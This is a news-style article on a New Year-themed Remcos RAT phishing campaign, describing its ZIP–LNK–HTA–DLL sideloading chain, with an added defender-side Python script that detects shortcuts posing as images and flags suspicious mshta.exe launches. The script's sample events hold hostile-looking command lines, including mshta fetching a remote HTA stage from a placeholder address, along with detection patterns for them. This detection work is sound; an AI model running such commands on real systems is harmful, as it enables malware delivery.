As the world joyfully embraced the New Year, malicious actors lurked in the shadows, capitalizing on the celebratory atmosphere to propagate a sophisticated malware campaign. In a recent report by Cyble Research and Intelligence Labs (CRIL), alarming details emerged about a multi-stage malware campaign linked to the notorious Remcos RAT, shedding light on the potential infiltration of systems through cunningly disguised spam emails.
The malicious campaign began with the discovery of a ZIP archive file innocently named “happy new year.zip” on the malware analysis platform VirusTotal. The seemingly harmless attachment concealed a shortcut (LNK) file cunningly masquerading as a PNG image. Upon execution, the shortcut file employed MSHTA and JavaScript to initiate a download, presenting the user with a decoy “Happy New Year” image as a diversionary tactic.
However, the devil was in the details as CRIL’s investigation delved deeper into the intricacies of this cyber threat. The IP address associated with the New Year-themed spam email campaign had a sinister history, having previously been linked to the notorious Remcos RAT. Renowned for its remote access and surveillance capabilities, Remcos RAT has become a weapon of choice among threat actors for orchestrating malicious campaigns.
This particular campaign demonstrated a level of sophistication in social engineering, exploiting global trends to deceive victims. Targets received phishing emails seemingly offering information on COVID-19 safety measures or exclusive New Year celebration deals. Cloaked within the seemingly innocent PDF attachments was a cleverly disguised Remcos RAT dropper, accompanied by a VBS file for malware execution. The malware ensured persistence by adding a Startup registry key, allowing it to remain active even after a system restart.
Once infiltrated, the Remcos RAT exhibited concerning activities, including evading antivirus detection, masquerading as a legitimate Windows process, acquiring admin privileges, and disabling User Account Control (UAC). Its capabilities extended to data theft, execution of backdoor commands, and the potential compromise of both system security and user privacy.
The infection chain unfolded with a deceptive lure image in a seemingly harmless spam email, leading to the execution of a multi-stage process involving ZIP, LNK, HTA, and DLL sideloading. Victims were misled into believing they were innocently opening an image file, while a malicious payload was silently downloaded and executed in the background.
Technical analysis conducted by CRIL unveiled the intricacies of the malware’s execution, from the initial ZIP archive to the final connection with the Command and Control (C&C) server. The disguised PNG file, the HTA file, and the subsequent DLL sideloading all played crucial roles in the malware’s stealthy progression.
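Two of the stages described above, the shortcut disguised as a PNG inside the ZIP and the MSHTA launch that fetches the HTA stage, leave traces a defender can check for. The script below is an added example and is not code from the Cyble (CRIL) report or from the campaign itself: it inspects an archive for a Windows shortcut whose name presents it as an image, and scans process-creation records for mshta.exe being launched with inline script, a remote URL, or an HTA in a user-writable directory. The pipe-delimited event format, the file names, the 192.0.2.10 address and every sample input are constructed for the demonstration.

```python
"""Defender-side checks for the Remcos infection chain described above.

Added example, not code from the Cyble (CRIL) report: it inspects an archive for
a shortcut (.lnk) that is presented as an image, and scans process-creation
records for mshta.exe launching inline script, a remote URL, or an HTA dropped
in a user-writable directory. Event format, paths and sample data are constructed.
"""
import io
import re
import zipfile

# Every Windows shortcut starts with HeaderSize 0x4C followed by the ShellLink
# CLSID {00021401-0000-0000-C000-000000000046}; the file name can lie, these bytes cannot.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")


def suspicious_archive_members(zip_bytes: bytes) -> list:
    """Return names of archive members that are LNK files dressed up as images."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            with archive.open(info) as member:
                head = member.read(len(LNK_MAGIC))
            if head != LNK_MAGIC:
                continue  # not a shortcut, nothing to flag here
            lower = info.filename.lower()
            # "card.png.lnk": Explorer hides the trailing .lnk, the user sees an image
            double_ext = any(lower.endswith(ext + ".lnk") for ext in IMAGE_EXTS)
            # "card.png": the bytes are a shortcut even though the name says image
            fake_image = lower.endswith(IMAGE_EXTS)
            if double_ext or fake_image:
                findings.append(info.filename)
    return findings


# Constructed process-creation records in the form Image|CommandLine|ParentImage
# (a simplified stand-in for the fields a Sysmon process-create event carries).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\mshta.exe|mshta.exe javascript:close()|C:\Windows\explorer.exe",
    r"C:\Windows\System32\mshta.exe|mshta.exe C:\Users\u\AppData\Local\Temp\card.hta|C:\Windows\explorer.exe",
    r"C:\Windows\System32\mshta.exe|mshta.exe http://192.0.2.10/stage2.hta|C:\Windows\System32\cmd.exe",
    r"C:\Windows\explorer.exe|C:\Windows\Explorer.EXE|C:\Windows\System32\userinit.exe",
    r"C:\Windows\System32\notepad.exe|notepad.exe notes.txt|C:\Windows\explorer.exe",
]

INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
USER_WRITABLE_HTA = re.compile(r"\\(AppData|Temp|Downloads)\\.*\.hta\b", re.IGNORECASE)


def flag_mshta_events(events) -> list:
    """Return (command_line, reason) pairs for mshta.exe launches matching the chain."""
    hits = []
    for record in events:
        image, cmdline, _parent = record.split("|", 2)
        if not image.lower().endswith("\\mshta.exe"):
            continue
        if INLINE_SCRIPT.search(cmdline):
            hits.append((cmdline, "inline-script"))
        elif REMOTE_URL.search(cmdline):
            hits.append((cmdline, "remote-hta"))
        elif USER_WRITABLE_HTA.search(cmdline):
            hits.append((cmdline, "local-hta-user-path"))
    return hits


def build_sample_zip() -> bytes:
    """Constructed archive: a double-extension shortcut, a mislabelled shortcut, two benign files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("happy new year.png.lnk", LNK_MAGIC + b"\x00" * 56)
        archive.writestr("card.png", LNK_MAGIC + b"\x00" * 56)
        archive.writestr("real.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        archive.writestr("notes.txt", b"happy new year")
    return buf.getvalue()


if __name__ == "__main__":
    for name in suspicious_archive_members(build_sample_zip()):
        print("shortcut disguised as image:", name)
    for cmdline, reason in flag_mshta_events(SAMPLE_EVENTS):
        print(f"{reason}: {cmdline}")
```

The archive check keys on the shortcut header rather than the extension, so renaming the file does not hide it; the process check treats an inline `javascript:` argument, a remote URL, and an HTA under a user-writable path as three distinct findings, because a legitimate mshta.exe launch of an installed HTA from Program Files should not raise an alert.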
As we usher in the New Year with celebrations and optimism, the digital realm remains vulnerable to malicious actors exploiting the joyous themes for nefarious deeds. The involvement of Remcos RAT in this New Year-themed malware campaign underscores the evolving nature of dark web markets, particularly in the sale and promotion of malware, trojans, RATs, and Ransomware as a Service (RaaS) products. Cybersecurity vigilance and awareness are paramount as we navigate the digital landscape in 2024.